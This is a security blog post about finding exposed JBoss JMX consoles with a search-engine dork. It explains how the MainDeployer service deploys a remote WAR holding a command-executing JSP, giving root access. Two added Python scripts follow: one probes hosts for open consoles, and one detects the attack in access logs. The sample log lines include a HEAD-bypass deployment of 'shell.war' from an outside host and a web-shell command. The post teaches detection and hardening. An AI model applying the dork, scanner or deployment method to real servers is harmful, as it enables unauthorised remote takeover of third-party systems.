ODS – Cybersecurity
Hacking systems running JBoss JMX Console with Google & Bing

  • October 23, 2017
  • Gonzalo Garcia
  • ODS Lab

Google and Bing dorks are still one of the easiest ways to find vulnerable servers and web services. This short article covers what I consider one of the most effective dorks for quickly spotting servers that are potentially vulnerable to remote code execution.

JBoss is a widely used Java Enterprise Edition application server. Java EE applications are strongly associated with large corporate environments, so enterprise management applications written in Java are as common as those written in Microsoft .NET.

Servers

One of the peculiarities of JBoss is that it ships, by default, with a web-based management console (the JMX console) that lets you manage, configure and deploy services inside the JBoss server. Why is that interesting? The console allows services packaged as WAR archives to be deployed directly from the web interface, so if it is reachable from the Internet without any access control, anyone can deploy Java code on the server.

The JBoss console is usually found at the /jmx-console path. Renaming this path is uncommon, so open consoles are easy to find with the Google search inurl:"/jmx-console". The service usually listens on ports associated with development environments (8080, 8081, ...), although it also turns up on production ports (80 and 443) and on less common ones.
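Once a search engine has produced a list of candidate hosts, the next step is to confirm which of them really serve the console without authentication. The following Python script is an added example for that triage step; it is not code from the original article. It assumes a JBoss 4/5-style console whose index page contains strings such as "JMX Agent View" (an assumption; adjust the markers for your target), and it treats a 401 or a WWW-Authenticate header as "protected". The sample responses at the bottom are constructed, not real captures, so the classifier can be exercised offline.

```python
"""Triage candidate JBoss hosts for an exposed JMX console (added example, not the article's code)."""
from urllib.request import Request, urlopen
from urllib.error import HTTPError, URLError

# Ports the article lists plus a few common alternates (assumption: tune to your scope).
DEFAULT_PORTS = (8080, 8081, 80, 443, 8443, 9080)
CONSOLE_PATH = "/jmx-console/"
# Strings expected on a JBoss 4/5 JMX console index page (assumption; verify on a known instance).
CONSOLE_MARKERS = ("JMX Agent View", "jboss.system:type=Server", "HtmlAdaptor")


def candidate_urls(host, ports=DEFAULT_PORTS):
    """Build the URLs to probe; 443 and 8443 are assumed HTTPS, everything else HTTP."""
    urls = []
    for port in ports:
        scheme = "https" if port in (443, 8443) else "http"
        urls.append(f"{scheme}://{host}:{port}{CONSOLE_PATH}")
    return urls


def classify(status, headers, body):
    """Classify a captured HTTP response to /jmx-console/.

    Returns one of:
      'open'      - console served without authentication (the dangerous case)
      'protected' - console present but HTTP authentication is demanded
      'absent'    - not found, or not a JBoss JMX console at all
    """
    if status == 401 or "www-authenticate" in {k.lower() for k in headers}:
        return "protected"
    if status == 200 and any(marker in body for marker in CONSOLE_MARKERS):
        return "open"
    return "absent"


def probe(url, timeout=5):
    """Fetch one URL and classify it. Network call: only run against hosts you are authorised to test."""
    try:
        req = Request(url, headers={"User-Agent": "jmx-console-triage"})
        with urlopen(req, timeout=timeout) as resp:
            body = resp.read(4096).decode("utf-8", "replace")
            return classify(resp.status, dict(resp.headers), body)
    except HTTPError as err:
        return classify(err.code, dict(err.headers), "")
    except (URLError, OSError):
        return "unreachable"


# Constructed sample responses (not real captures) so the classifier can run offline.
SAMPLE_OPEN = (200, {"Content-Type": "text/html"},
               "<html><head><title>JBoss JMX Management Console</title></head>"
               "<body><h1>JMX Agent View</h1> ... jboss.system:type=Server ...</body></html>")
SAMPLE_PROTECTED = (401, {"WWW-Authenticate": 'Basic realm="JBoss JMX Console"'}, "")
SAMPLE_ABSENT = (404, {"Content-Type": "text/html"}, "<h1>404 Not Found</h1>")

if __name__ == "__main__":
    for sample in (SAMPLE_OPEN, SAMPLE_PROTECTED, SAMPLE_ABSENT):
        print(sample[0], "->", classify(*sample))
    # Example of the URLs a real probe run would hit (hostname is a placeholder):
    for url in candidate_urls("jboss.example.internal"):
        print(url)
```

`probe()` is the only function that touches the network; everything else is pure so the classification rules can be unit-tested against captured responses before a run. A 200 without the markers is reported as "absent" rather than "open" on purpose: many reverse proxies return a generic 200 page for unknown paths, and treating that as a hit is the usual source of false positives in dork-driven scans.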

Practical example

When accessing one of these consoles, we find an interface similar to the following image:

The console displays an index of all registered services (MBeans). We will focus on the MainDeployer service, although ServerInfo is also of interest.

The ServerInfo service reports the server architecture and the operating system the JVM is running on.

The MainDeployer service lets you deploy a .war archive. The most dangerous part is that it accepts a URL as the source of the archive: JBoss fetches the file from that URL and deploys it exactly as if it had been placed in its own deploy directory.

 

What happens if the archive we supply as a parameter is hosted on a server we control and contains a JSP that accepts commands through GET or POST parameters and executes them on the system?

Bad news: remote code execution on the server. In the previous image (a fictitious case in a local lab, used as a demonstration), control is obtained as root on the server. For readers without a technical background, this means total and absolute control over the vulnerable machine.

By automating the console searches and doing some scraping, more than 200 distinct vulnerable servers can be found in a few seconds. Interesting, isn't it?
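The deployment described above leaves a very recognisable trace: the console form submits an invokeOp request to /jmx-console/HtmlAdaptor naming jboss.system:service=MainDeployer, with the archive URL in arg0. The following Python script is an added example (not code from the original article) of detection logic that a defender can run over web server access logs to catch that pattern. It assumes the Apache/nginx combined log format and flags the request regardless of HTTP method, because the security-constraint that JBoss shipped for the console originally covered only GET and POST, so HEAD requests reached the MBean unauthenticated (CVE-2010-0738). The log lines at the bottom are constructed for the example; the methodIndex value in them is illustrative and varies between JBoss versions.

```python
"""Flag JMX console deployment attempts in access logs (added example, not the article's code)."""
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx combined log format (assumption: adapt the regex for other formats).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) \S+" (?P<status>\d{3})'
)

# MBeans whose invocation from the console amounts to code execution or staging for it.
DANGEROUS_MBEANS = (
    "jboss.system:service=MainDeployer",             # deploy a WAR/EAR fetched from any URL
    "jboss.admin:service=DeploymentFileRepository",  # write a file straight into deploy/
    "jboss.deployer:service=BSHDeployer",            # run a BeanShell script
)


def parse_line(line):
    """Split one combined-format log line into fields; None if it does not match."""
    match = LOG_RE.match(line)
    if not match:
        return None
    entry = match.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def analyse(entry):
    """Return a finding for a suspicious JMX console request, else None.

    Severity ladder:
      low      - any request under /jmx-console/ (noisy, but worth a look on a production host)
      high     - invokeOp on a dangerous MBean, whatever the HTTP method (HEAD bypass, CVE-2010-0738)
      critical - the same with arg0 pointing at a remote URL: the WAR-from-attacker-server pattern
    """
    parts = urlsplit(entry["uri"])
    if not parts.path.startswith("/jmx-console/"):
        return None
    query = parse_qs(parts.query)          # parse_qs percent-decodes the values for us
    action = query.get("action", [""])[0]
    name = query.get("name", [""])[0]
    severity, reason = "low", "JMX console access"
    if action == "invokeOp" and name in DANGEROUS_MBEANS:
        severity = "high"
        reason = f"invokeOp on {name} via {entry['method']}"
        arg0 = query.get("arg0", [""])[0]
        if re.match(r"^(https?|ftp)://", arg0, re.IGNORECASE):
            severity = "critical"
            reason += f", remote archive {arg0}"
    return {"ip": entry["ip"], "ts": entry["ts"], "status": entry["status"],
            "method": entry["method"], "severity": severity, "reason": reason}


def scan(lines):
    """Run the detection over an iterable of log lines and collect findings."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        finding = analyse(entry)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample log lines (not real traffic); 203.0.113.0/24 is the RFC 5737 documentation range.
SAMPLE_LOG = [
    '203.0.113.5 - - [23/Oct/2017:10:00:01 +0100] "GET /index.html HTTP/1.1" 200 512',
    '203.0.113.7 - - [23/Oct/2017:10:00:02 +0100] "GET /jmx-console/ HTTP/1.1" 200 20431',
    '203.0.113.7 - - [23/Oct/2017:10:00:09 +0100] "HEAD /jmx-console/HtmlAdaptor?action=invokeOp'
    '&name=jboss.system%3Aservice%3DMainDeployer&methodIndex=17'
    '&arg0=http%3A%2F%2F203.0.113.7%2Fshell.war HTTP/1.1" 200 0',
    '203.0.113.7 - - [23/Oct/2017:10:00:12 +0100] "GET /shell/cmd.jsp?cmd=id HTTP/1.1" 200 88',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['ts']} {f['ip']} {f['method']} -> {f['reason']} ({f['status']})")
```

Note what the rule does not catch: the last sample line, the attacker using the freshly deployed JSP, is outside /jmx-console/ because the context path of the WAR is the attacker's choice, so the deployment request itself is the reliable signal and should be alerted on even when it returns 200 with a zero-length body. On the hardening side, the fix is to enforce the security-constraint in jmx-console.war/WEB-INF/web.xml without an http-method list (so HEAD and other verbs are covered too), or to remove the console from Internet-facing instances altogether.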

Gonzalo Garcia
Gonzalo began his career in the security field in 2017 and has developed into a talented researcher and security analyst. Since then he has not stopped reporting important vulnerabilities affecting Canarian companies and others across Spain. To this day he performs pentests and develops solutions to protect businesses and public organisations within the Open Data Security team. Gonzalo is also a speaker, and has participated in cybersecurity events such as Hackron (Tenerife) and RootedCON (Madrid).